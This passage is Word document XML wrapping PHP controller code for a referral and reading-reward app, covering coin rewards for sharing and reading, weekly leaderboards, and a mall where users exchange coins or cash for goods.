      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章分享获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再分享可获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1716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BD7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194E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E50D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4C0C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if($yaoqing['jinbi_fenxiang_2_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88A7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徒弟文章分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47965B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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E6B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5EDCF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$money=$yaoqing['jinbi_fenxiang_2_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F418B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609292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7203B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13EFD3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72961A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038D4D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E15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071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DCB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8C3C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 == 'money_jindu'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEEA2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if($yaoqing['jinbi_jindu_2']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E7B1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阅读收益奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63866D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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3729CE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 &lt; $yaoqing['money_jindu_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB8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$money=rand(1,$yaoqing['jinbi_jindu_2']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD43B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350061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6AB05A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0A8812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214CF5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207548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707F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D101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json_encode(['jinbi'=&gt;$money]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093AD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15C52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json_encode(['0']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE42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33C3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E622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if($yaoqing['jinbi_jindu_2_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B830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$content='uid:'.$uid.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>徒弟阅读收益奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516F6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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC0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 &lt; $yaoqing['money_jindu_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A34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$money=rand(1,$yaoqing['jinbi_jindu_2_s1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D5E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240A3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36B7E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4951FB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691FD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05002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A09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BBB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E6B5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DA2C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 == 'jinbi_jindu_2_s1_s'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0DE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$this-&gt;baoxiangConfigJinbis(input('data'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0896FB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3E18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357E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paihang(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D5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$type=input('type/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1382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1A8287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$where['a.type']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA07D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$where['a.data']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F74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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197EB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['__MEMBER__ b','a.uid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2957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['__YAOQING__ c','c.uid = b.id']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69198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C90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$data=Db::name('yaoqing_records')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;whereTime('time','week')-&gt;field('sum(a.money) as money_num,b.id,b.nickname,b.mobile,c.tudi_num')-&gt;group('a.uid')-&gt;order('money_num desc')-&gt;limit(100)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BA3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3930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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A02CD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['__MEMBER__ b','a.uid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A06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E4A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$data=Db::name('yaoqing')-&gt;alias('a')-&gt;join($join)-&gt;field('b.id,b.nickname,b.mobile,a.tudi_num,a.money_num')-&gt;order('a.money_num desc')-&gt;limit(100)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75AE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BE19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25D2DF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if(!$v['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C701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$data[$k]['nickname']=_username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F5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1498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$data[$k]['money']=_money($v['money_num']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1AC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4E1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3A083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BF42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yesterday(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C626D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$where['uid']=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FDDE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$where['type']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444980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$where['data']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB68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$a=Db::name('yaoqing_records')-&gt;where($where)-&gt;whereTime('time','yesterday')-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606889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$where['type']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25747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$b=Db::name('yaoqing_records')-&gt;where($where)-&gt;whereTime('time','yesterday')-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B640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json_encode(['a'=&gt;_money($a),'b'=&gt;$b]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC5DC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AF60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mall(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26D4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$data=Db::name('shoplist_typeid')-&gt;field('id,title')-&gt;where(['hide'=&gt;1])-&gt;cache(_cache('db'))-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA92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3B671E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$shoplist=Db::name('shoplist')-&gt;where(['typeid'=&gt;$v['id'],'hide'=&gt;1])-&gt;cache(_cache('db'))-&gt;order('des </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>desc,id desc')-&gt;field('id,title,image,jinbi,money')-&gt;limit(6)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C68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($shoplist as $ks =&gt; $vs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D2ED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$shoplist[$ks]['jinbi']=$vs['jinbi'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F63C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$shoplist[$ks]['money']=_money($vs['money']).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DD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$shoplist[$ks]['image']=_imgUrl().$vs['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643300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B9C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$data[$k]['data']=$shoplist;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598BC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D52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4952AF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26E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mallList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B6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18A6F3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if(input('typeid/d')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C9E6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$where['typeid']=input('typeid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A12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47CD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$data=Db::name('shoplist')-&gt;field('id,title,image,jinbi,money')-&gt;where($where)-&gt;cache(_cache('db'))-&gt;order('des desc,id desc')-&gt;paginate()-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B062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77B37E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$data['data'][$k]['jinbi']=$v['jinbi'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF62A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$data['data'][$k]['money']=_money($v['money']).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEFE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$data['data'][$k]['image']=_imgUrl().$v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532583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31CD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4E9B8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E00D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mallView(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117CD7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$id=input('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D6F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$data=Db::name('shoplist')-&gt;where(['hide'=&gt;1,'id'=&gt;$id])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A8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$data['images']=json_decode($data['images'],true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482596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foreach($data['images'] as $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6516CB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$images[]=_imgUrl().$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369934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8BC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$data['images']=$images;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43250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$data['money']=_money($data['money']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E18B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$data['image']=_imgUrl().$data['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C31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Db::name('shoplist')-&gt;where('id',$id)-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE353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$data['click']=$data['click']+1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F85D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$data['text'] = str_replace("/public/uploads/",config()['appConfig']['url']."/public/uploads/",$data['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1663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1BE8DD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9554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mallPay(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED41F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$shopid=input('shopid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC01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$type=input('type/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A8A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$xingming=input('xingming');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E43B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$mobile=input('mobile');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CBF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$dizhi=input('dizhi');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A51B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$alipay=input('alipay');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A1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A94A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'xingming|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'              =&gt;       'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7501AB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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EC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'dizhi|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>详细地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C324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'alipay|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支付宝号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416393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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>兑换方式</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require|number|in:1,2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241FC4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C4A1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6DE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'xingming'             =&gt;      $xingming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56011B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=&gt;      $mobile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03934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'dizhi'             =&gt;      $dizhi,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D78A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'alipay'             =&gt;      $alipay,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE42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1AC62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5558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6B2B8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exit(json_encode(['err'=&gt;$validate-&gt;getError()]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF38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84E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if(!_isMobile($mobile)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4146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手机不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19291D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4EC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$pattern="/([a-z0-9]*[-_.]?[a-z0-9]+)*@([a-z0-9]*[-_]?[a-z0-9]+)+[.][a-z]{2,3}([.][a-z]{2})?/i";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC74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if(!preg_match($pattern,$alipay)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E44C0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if(!_isMobile($alipay)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA26E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支付宝号码不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286C3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6983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E0C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$shop=Db::name('shoplist')-&gt;where(['id'=&gt;$shopid,'hide'=&gt;1])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766DF2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if(!$shop){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A3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商品不存在或已下架</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699BE2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484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if(!intval($shop['num'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B819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商品存库不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B77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9FB4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if($type==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DCD2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if(!$this-&gt;member['yaoqing']['jinbi'] || $shop['jinbi'] &gt; $this-&gt;member['yaoqing']['jinbi']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385E6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金币不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F70B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7565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C819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if($type==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9342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if(!$this-&gt;member['yaoqing']['money'] || $shop['money'] &gt; $this-&gt;member['yaoqing']['money']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64CE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零钱不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2545C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1753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4CB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01DA57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305B6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$code=($type==1 ? 'A' : 'B').rand(1000000,9999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E036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Db::name('shoplist_records')-&gt;insert([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23474E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'shopid'    =&gt;  $shop['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A1A9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'num'       =&gt;  1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCC3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48F2E8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$this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D50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6DC81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=&gt;  $code,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFD0A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'ip'        =&gt;  $ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198974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$shop['money'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49527F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'xingming'  =&gt;  $xingming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF2A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'dizhi'     =&gt;  $dizhi,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64180B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=&gt;  $mobile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097187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'alipay'    =&gt;  $alipay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637778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564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$typeJInbiMoney=$type==1 ? 'jinbi' : 'money';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42C6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$content='id:'.$shop['id'].($type==1 ? ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">' : ' </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>').'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>商品兑换</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB96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47AED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$this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B8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$typeJInbiMoney =&gt;  [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B20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$shop[$typeJInbiMoney],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F008B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42E38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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB833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9030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A9E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Db::name('shoplist')-&gt;where(['id'=&gt;$shopid])-&gt;setDec('num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323043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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>兑换成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACA6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8EF1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mallOrder(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C93C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$where['a.uid']=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24C3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7148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['__SHOPLIST__ b','a.shopid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F4A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E335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$data=Db::name('shoplist_records')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;field('a.shopid,a.data,a.code,a.time,a.money,a.kuaidi,a.danhao,a.data,a.type,a.num,b.title,b.image')-&gt;order('a.time desc')-&gt;paginate()-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B8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foreach($data['data'] as $k =&gt; $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1DB8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$data['data'][$k]['image']=_imgUrl().$v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CA5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if($v['type']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7349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$data['data'][$k]['money']=_money($v['money']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD773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766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$data['data'][$k]['time']=date('Y-m-d H:i:s',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66700C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$f=[0=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等待平台发货</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',1=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
